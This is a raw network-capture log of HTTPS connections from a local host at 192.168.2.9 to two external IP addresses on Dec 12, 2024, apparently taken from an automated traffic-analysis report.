                                                                                                                                                                        Dec 12, 2024 16:53:50.182920933 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.183005095 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.183029890 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.183224916 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.193319082 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.193378925 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.193406105 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.193466902 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.203037024 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.203124046 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.203181028 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.203377962 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.213445902 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.213519096 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.213546038 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.213699102 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.222722054 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.222789049 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.223598003 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.223651886 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.231743097 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.231803894 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.231851101 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.231913090 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.241164923 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.241252899 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.241267920 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.241316080 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.249639034 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.249720097 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.249737978 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.249789953 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.250905037 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.250963926 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.258071899 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.258147001 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.259402990 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.259473085 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.266402006 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.266482115 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.267586946 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.267656088 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.272708893 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.272773981 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.273922920 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.273977041 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.282787085 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.282865047 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.283951044 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.284013033 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.285228014 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.285281897 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.286962032 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.287020922 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.291418076 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.291481972 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.292165041 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.292222023 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.302607059 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.302658081 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.303818941 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.303881884 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.304285049 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.304349899 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.306853056 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.306920052 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.309173107 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.309223890 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.310343981 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.310393095 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.314471006 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.314529896 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.315691948 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.315747976 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.319753885 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.319811106 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.321037054 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.321089029 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.324841976 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.324896097 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.324944973 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.324990988 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.330008030 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.330070972 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.330089092 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.330136061 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.335803032 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.335891962 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.335949898 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.335999012 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.340442896 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.340507984 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.340536118 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.340598106 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.345417023 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.345499039 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.345508099 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.345552921 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.350805044 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.350939989 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.350950003 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.351042986 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.355256081 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.355346918 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.355351925 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.355415106 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.360367060 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.360445976 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.360450029 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.360507965 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.365359068 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.365437031 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.365452051 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.365518093 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.370243073 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.370311022 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.370318890 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.370357037 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.374963999 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.375055075 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.375060081 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.375118971 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.380225897 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.380310059 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.380338907 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.380399942 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.380620956 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.380659103 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.380717039 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.653860092 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:50.653902054 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.654087067 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:50.654355049 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:50.654371023 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:51.879755974 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:51.880004883 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:51.883301973 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:51.883342981 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:51.883696079 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:51.883789062 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:51.884094000 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:51.927330017 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.057642937 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.057785034 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.073654890 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.073846102 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.177372932 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.177479029 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.177607059 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.177659035 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.181468010 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.181580067 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.249440908 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.249561071 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.253137112 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.253248930 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.253262043 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.253319025 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.258544922 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.258618116 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.266011953 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.266057014 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.267252922 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.267301083 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.274720907 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.274831057 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.278166056 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.278243065 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.283500910 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.283566952 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.292663097 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.292737961 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.295839071 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.295969963 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.305963993 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.306050062 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.308727026 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.308790922 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.319014072 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.319070101 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.321800947 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.321852922 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.331701994 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.331780910 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:52.331787109 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.331835032 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:52.332793951 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.332851887 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.335930109 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.335978031 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.341917992 CET49740443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:52.341934919 CET4434974034.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.346935987 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.347001076 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.348622084 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.348671913 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.360567093 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.360647917 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.363435984 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.363487959 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.373665094 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.373728037 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.373739958 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.373788118 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.387557983 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.387708902 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.387716055 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.387759924 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.400852919 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.400970936 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.441399097 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.441499949 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.441526890 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.441570997 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.443623066 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.443671942 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.448201895 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.448277950 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.448286057 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.448328018 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.452101946 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.452172995 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.452497959 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.452541113 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.461458921 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.461499929 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.461514950 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.461525917 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.461549044 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.461561918 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.472193003 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.472280025 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.472291946 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.472448111 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.483270884 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.483362913 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.483371019 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.483529091 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.492949009 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.493055105 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.493062019 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.493103027 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.503094912 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.503177881 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.503386974 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.503526926 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.513029099 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.513093948 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.513150930 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.513195038 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.523215055 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.523283958 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.523397923 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.523438931 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.533978939 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.534017086 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.534027100 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.534068108 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.544518948 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.544569969 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.544576883 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.544620037 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.552972078 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.553039074 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.553044081 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.553086042 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.561913013 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.561979055 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.561985970 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.562022924 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.571672916 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.571762085 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.571805954 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.571954966 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.579885960 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.579961061 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.579974890 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.580116034 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.580122948 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.580163002 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.581243992 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.581346989 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.588152885 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.588222980 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.589492083 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.589549065 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.596864939 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.596937895 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.597870111 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.597924948 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.603440046 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.603532076 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.604985952 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.605055094 CET49725443192.168.2.9142.250.181.65
